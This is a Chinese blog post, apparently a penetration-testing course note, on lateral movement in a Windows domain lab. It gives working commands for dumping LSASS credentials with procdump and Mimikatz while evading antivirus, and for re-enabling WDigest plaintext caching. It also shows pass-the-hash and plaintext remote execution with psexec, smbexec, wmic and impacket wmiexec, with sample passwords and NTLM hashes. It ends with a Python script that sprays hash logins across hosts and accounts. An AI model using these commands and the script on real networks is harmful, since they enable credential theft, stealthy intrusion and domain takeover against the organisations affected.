内网安全-域横向smb&wmi明文或hash传递

最新推荐文章于 2024-01-16 14:31:37 发布
最新推荐文章于 2024-01-16 14:31:37 发布
阅读量3.6k 收藏 6
点赞数 1
分类专栏: 渗透笔记2 文章标签: 哈希算法 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhscxj/article/details/123386988
版权

在这里插入图片描述
知识点1:

Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码
Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码
针对以上情况,我们提供了4种方式解决此类问题
1.利用哈希hash传递(path,ptk等)进行移动
2.利用其他服务协议(SMB,WMI等)进行哈希移动
3.利用注册表操作开启Wdigest Auth值进行获取
4.利用工具或第三方平台(Hachcat)进行破解获取

知识点2

Windows系统LM Hash及NTLM Hash加密算法,个人系统在Windows vista后,
服务器系统在Windows 2003以后,认证方法均为NTLM Hash

注册表修改,开启wdigest

reg add
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDige st /v UseLogonCredential /t REG DWORD /d 1 /f

在这里插入图片描述

案例 1-Procdump+Mimikatz 配合获取

当Mimikatz被杀毒软件拦截,可通过procdump 配合 mimikatz
因为procdump是windows官方的软件,所以在实战时一般不会对其进行拦截

procdump -accepteula -ma lsass.exe lsass.dmp
mimikatz 上执行:
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full


#Pwdump7
#QuarksPwdump

hashcat -a0-m 1000hash file --force

上传到对方服务器,并通过命令执行,执行后会在当前目录生成一个lsass.dmp文件
在这里插入图片描述
将对方服务器上生成的dmp文件复制到本地mimikatz的目录
在本机通过mimikatz来读取dmp文件里的内容

在这里插入图片描述
此处为读取的对方服务器上的密码
在这里插入图片描述

案例 2-域横向移动 SMB 服务利用-psexec,smbexec(官方自带)

利用 SMB 服务可以通过明文或 hash 传递来远程执行,条件 445 服务端口开放。

#psexec 第一种:先有 ipc 链接,psexec 需要明文或 hash 传递
net use \\192.168.3.32\ipc$ "admin!@#45" /user:ad
ministrator
psexec \\192.168.3.32 -s cmd # 需要先有 ipc 链接 -s 以 System 权限运行

#psexec 第二种:不用建立 IPC 直接提供明文账户密码
psexec \\192.168.3.21 -u administrator -p Admin12345 -s cmd

psexec -hashes :$HASH$ ./administrator@10.1.2.3
psexec -hashes :$HASH$ domain/administrator@10.1.2.3

psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 官方 Pstools 无法
采用 hash 连接
#非官方自带-参考 impacket 工具包使用,操作简单,容易被杀

#smbexec 无需先 ipc 链接 明文或 hash 传递
smbexec god/administrator:Admin12345@192.168.3.21
smbexec ./administrator:admin!@#45@192.168.3.32

smbexec -hashes :$HASH$ ./admin@192.168.3.21
smbbexec -hashes :$HASH$ domain/admin@192.168.3.21

smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
smbexec -hashes :ccef208c6485269c20db2cad21734fe7god/administrator@192.168.3.21

psexec 第一种:先有 ipc 链接,psexec 需要明文或 hash 传递
将官方的PSTools上传到对方服务器,通过信息收集获取内网其他主机的ip与密码
切换到PSTools目录,通过net use连接内网的目标主机,再通过psexec执行命令
在这里插入图片描述
psexec 第二种:不用建立 IPC 直接提供明文账户密码
将官方的PSTools上传到对方服务器,通过信息收集获取内网其他主机的ip与密码
切换到PSTools目录,不需要用net use 命令建立连接,但仍需要明文密码
在这里插入图片描述
可以通过非官方自带impacket 工具包进行hash密文连接,容易被杀
将impacket-examples-windows上传到对方服务器
切换到impacket-examples-windows目录通过psexec进行密文连接
在这里插入图片描述

smbexec 无需先 ipc 链接 明文或 hash 传递,非官方
将impacket-examples-windows上传到对方服务器
切换到impacket-examples-windows目录,通过smbexec进行连接,对192.168.3.21上的域(god)用户administrator进行连接
在这里插入图片描述对192.168.3.21上的本地用户administrator进行连接
在这里插入图片描述
当我们获取不到明文密码时,也可以通过hash密文密码连接
在这里插入图片描述

案例 3-域横向移动 WMI 服务利用-cscript,wmiexec,wmic

WMI(Windows Management Instrumentation) 是通过 135 端口进行利用,支持用户名明文或者 hash
的方式进行认证,并且该方法不会在目标日志系统留下痕迹。

自带 WMIC 明文传递 无回显 官方
wmic /node:192.168.3.21 /user:administrator /password:Admin12345 process call create "cmd.exe /c 
ipconfig >C:\1.txt"

自带 cscript 明文传递 有回显
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

套件 impacket wmiexec 明文或 hash 传递 有回显 exe 版本
wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"
wmiexec god/administrator:Admin12345@192.168.3.21 "whoami"
wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"
wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21 "whoami"

自带 WMIC 明文传递 无回显 官方
缺点:无回显,需要自己去读取目标主机上执行命令产生结果的文件内容
优点:不会被杀毒软件干扰
在这里插入图片描述目标主机C盘目录下1.txt文件内容
在这里插入图片描述

自带 cscript 明文传递 有回显

将wmiexec.vbs上传到对方主机
需要借助wmiexec.vbs文件,切换到wmiexec.vbs所在目录执行cmd窗口
在这里插入图片描述
套件 impacket wmiexec 明文或 hash 传递 有回显 exe 版本
有可能被杀毒软件拦截

上传后切换到impacket-examples-windows目录,通过wmiexec执行
在这里插入图片描述wmiexec通过hash密文连接执行命令
在这里插入图片描述
总结:
通过官方PSTools中psexec连接时只能用明文密码进行连接,但是不会被杀毒软件拦截
通过官方自带命令WMIC时,只支持明文且没有回显需自己读取
通过官方自带命令cscript与wmiexec.vbs配合时有回显,但是只支持明文
通过非官方impacket-examples-windows中psexec和smbexec和wmiexec连接时可支持密文hash密码连接,但容易被杀毒软件拦截
现在基本通过mimikatz获取的密码都是密文的

案例 4-域横向移动以上服务 hash 批量利用-python 编译 exe

假设当入侵并提权成功一个主机后,对内网的其它主机进行渗透

通过mimikatz获取主机当前的明文或hash密文密码
在这里插入图片描述
ip探针,查看当前存活的主机的ip
在这里插入图片描述
收集域内用户信息
在这里插入图片描述
当只获取到hash密文密码时
通过python脚本,批量的连接进行测试

#pyinstaller.exe -F fuck_neiwang_002.py

import os,time
ips={
'192.168.3.21',
'192.168.3.25',
'192.168.3.29',
'192.168.3.30',
'192.168.3.32'
}
users={
'Administrator',
'boss',
'dbadmin',
'fileadmin',
'mack',
'mary',
'webadmin'
}
hashs={
'ccef208c6485269c20db2cad21734fe7',
'518b98ad4178a53695dc997aa02d455c'
}
for ip in ips:
	for user in users:
		for mimahash in hashs:
			#wmiexec -hashes :hashgod/user@ipwhoami
			exec = "wmiexec -hashes :"+mimahash+" god/"+user+"@"+ip+" whoami"
			exec1 = "wmiexec -hashes :"+mimahash+" ./"+user+"@"+ip+" whoami"
			print('--->' + exec + '<---')
			print('--->' + exec1 + '<---')
			os.system(exec)
			os.system(exec1)
			time.sleep(0.5)

将py脚本通过pyinstaller编译成exe文件,上传到目标主机

因为py脚本中需要使用到wmiexec,所以也需将impacket-examples-windows中的wmiexec上传至目标主机,并且需与py编译的exe文件在一个目录下
在这里插入图片描述
当前目录下打开cmd窗口,运行通过py编译后的exe文件
在这里插入图片描述
运行结果,192.168.3.32的主机尝试连接成功
在这里插入图片描述
接下来,连接192.168.3.32的主机,通过mimikatz获取这个主机的密码

再将获取的密码添加到python编写的脚本里面,进行字典丰富

继续重复上面的步骤,执行python脚本编译的exe文件,尝试对其它主机进行连接

深白色耳机
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透总结三:第三步利用明文或者hash进行横向移动
yggcwhat
05-06 1202
内网渗透总结三:第三步利用明文或者hash进行横向移动
第67天-内网安全-横向smb&wmi明文hash传递
MCTSOG的博客
05-12 953
思维导图 知识点 无法获取明文密码: Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码 Windows2012以下版本若安装KB2871997补丁,同样也会导致无法获取明文密码 针对以上情况,我们提供了4种方式解决此类问题 1.利用哈希hash传递(pth,ptk等)进行移动 2.利用其它服务协议(SMB,WMI等)进行哈希移动 3.利用注册表操作开启Wdigest Auth值进行获取 注册表操作开启Wdigest Auth值 reg add HKL
我的内网渗透-代理转发(2)
h1825819493的博客
06-26 642
直接打开软件进行添加规则,添加的规则的地址端口就是跳板机的ip地址和开启代理的端口,这边是直接用的上面的反向代理。前面的端口转发转发的固定的端口,这个动态端口转发转发的可以是任意端口,可以在kali上连接靶机的任何端口服务。②首先在自己的kali中开启动态端口转发,然后修改在kali中的配置文件(不修改文件的话直接在火狐浏览器中设置代理也是可以完成转发,访问到靶机的内网的)。先进行后门的连接,连接成功后,可以以已经建立后门连接的机器作为跳板机,进行端口的转发(可以转发范围为跳板机所有可以达到的范围)
TCP/IP知识点总结
m0_48273471的博客
06-04 3629
网络基础、网络设备及使用、网络数据传输流程、应用层重点协议、传输层重点协议、网络层重点协议、数据链路层重点协议
Linux网络 ----- 网络文件共享服务之FTP服务
最新发布
AH99999的博客
01-16 1623
FTP(File TransferProtocol,文件传输协议)是典型的C/S架构的应用层协议,需要由服务端软件、客户端软件两个部分共同实现文件传输功能。FTP客户端和服务器之间的连接是可靠的,面向连接的,为数据的传输提供了可靠的保证。TCP协议:20,21端口。20端口用于建立数据连接,并传输文件数据。21端口用于建立控制连接,并传输FTP控制命令FTP文件传输协议:FTP是早期的三个应用级协议之一,基于C/S结构数据传输格式:二进制(默认)和文本。
内网渗透】横向smb&wmi明文hash传递
ssrf
03-07 1350
目录0x001 Procdump+Mimikatz配合获取用户信息0x002 无法获取明文密码解决方案1)hashcat暴力破解2)注册表操作开启Wdigest Auth值3)SMB服务协议进行哈希移动4)WMI服务利用-cscript,wmiexec,wmic 0x001 Procdump+Mimikatz配合获取用户信息 Mimikatz属于第三方软件,直接上传到目标主机可能被杀毒软件查杀,这时我们可以配合官方软件Procdump,将Procdump上传目标主机获取用户信息(该文件不可读),使用本地
内网安全横向传递攻击(SMB || WMI 明文hash 传递
网络安全领域___专研者.
06-09 2562
横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.(传递攻击主要建立在明文Hash值获取基础上进行攻击.)
内网安全横向smb&wmi明文hash传递
_Co1a
09-12 1048
下面讲的是psexec&smbexec以及wimc&wmiexec 知识点1: windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码 windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码 针对以上情况,提供了4钟方式解决此类问题 1.利用哈希hash传递(pth,ptk等)进行移动 2.利用其它服务协议(SMB,WMI等)进行哈希移动 3.利用注册表操作开启wdigest Auth值进行...
横向移动 -基于smb&wmi 明文hash 传递
mingyqf的博客
11-10 783
内网 横向 smb&wmi 明文hash 传递 演示案例:  Procdump+Mimikatz 配合获取  Hashcat 破解获取 Windows NTML Hash横向移动 SMB 服务利用-psexec,smbexec  横向移动 WMI 服务利用-cscript,wmiexec,wmic  横向移动以上服务 hash 批量利用-python 编译 exe 案例 1-Procdump+Mimikatz 配合获取 1.1procdump 配合 mimikatz
哈希传递常用方法
路虽远,行将至。事虽难,做必达。
05-13 504
随着人们的安全意识逐渐增强,企业内的服务器弱口令也逐渐减少,密码复杂度提高,当我们获取到服务器权限后,可以提取出用户密码hash,但多数情况下显然是难以解密出明文密码。这时候就需要用到内网hash传递技术了。哈希传递利用了NTLM认证机制的缺陷,可以直接利用密码hash值来进行NTLM认证。如果目标主机与我们提取到密码hash值的机器密码相同时,便可直接使用hash值来远程登录目标主机。
WMI-Class-Library.zip_WMI Class_wmi
09-23
WMI,包括WMI Namespace.chm 及 WMI.dll
使用j-Interop实现java连接wmi获取windows系统信息的例子
04-25
使用j-Interop实现java连接wmi获取windows系统信息的例子 可以直接导入MyEclipse运行,能够获取CPU,主板,显卡,声卡,网卡,以及CPU使用率,内存使用率等
CPU-info.zip_wmi cpu 内存
07-14
程序读取某些WMI类数据、CPU(包括核)和内存使用(使用性能计数器)。
dotnet-InvokeTheHash是一个可以执行WMISMB命令的PowerShell脚本
08-15
Invoke-TheHash是一个可以执行WMISMB命令的PowerShell脚本
clevo-xsm-wmi:https的克隆
05-11
clevo-xsm-wmi 用于Clevo SM系列笔记本电脑的键盘背光的内核模块。 (以及几种EM / ZM / DM系列型号) 基于TUXEDO Computers GmbH创建的tuxedo-wmi。 在tuxedo-wmi上的添加 Sysfs界面可在模块加载后控制亮度,...
p67 内网安全-横向 smb&wmi 明文hash 传递
weixin_43263566的博客
04-24 548
p67 内网安全-横向 smb&wmi 明文hash 传递
内网渗透哈希传递攻击
zzlx123的博客
12-18 1867
条件:获取到了某台主机的Administrator用户的LM-Hash和 NTLM-Hash ,并且该主机的445端口打开着,可利用 exploit/windows/smb/psexec 漏洞用MSF进行远程登录(哈希传递攻击)。(只能是administrator用户的LM-hash和NTLM-hash),这个利用跟工作组环境或者环境无关。 这个网站提供对密码转换成 LM-Hash 和 NTLM...
如何对Windows系统进行哈希传递***(Pass-Hash-Attack)
weixin_33994429的博客
08-26 390
『面向对象』本篇博文主要面向信息安全***测试初级人员以及信息安全***技术爱好者。『主要内容』主要介绍在后***测试阶段如何对Windows操作系统进行哈希传递***(Hash-Pass-Attack)。-------------------------------------------菜鸟起飞系列-------------------------------------...
php mysql 代理_SMProxy: Swoole MySQL Proxy 一个基于 MySQL 协议,Swoole 开发的MySQL数据库连接池。 A MySQL database conne...
weixin_32589387的博客
01-28 134
/$$$$$$ /$$ /$$ /$$$$$$$/$$__ $$| $$$ /$$$| $$__ $$| $$ \__/| $$$$ /$$$$| $$ \ $$ /$$$$$$ /$$$$$$ /$$ /$$ /$$ /$$| $$$$$$ | $$ $$/$$ $$| $$$$$$$//$$__ $$ /$$__ $$| $$ /$$/| $$...
WMI-Win32_NetworkAdapter 网卡参数
05-31
WMI-Win32_NetworkAdapter类可以用于获取与计算机上的网络适配器相关的信息。它包含了许多属性,可以用来获取网卡的参数,例如: - AdapterType:网络适配器的类型。 - MACAddress:网络适配器的物理地址。 - NetConnectionID:网络适配器的连接名称。 - NetEnabled:网络适配器是否启用。 - Speed:网络适配器的速度。 你可以使用WMI查询语言(WQL)来查询WMI-Win32_NetworkAdapter类的属性,以获取网卡参数的值。例如,以下是一个使用PowerShell查询网卡参数的示例: ``` Get-WmiObject -Class Win32_NetworkAdapter -Property AdapterType, MACAddress, NetConnectionID, NetEnabled, Speed ``` 这将返回计算机上所有网络适配器的AdapterType、MACAddress、NetConnectionID、NetEnabled和Speed属性的值。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值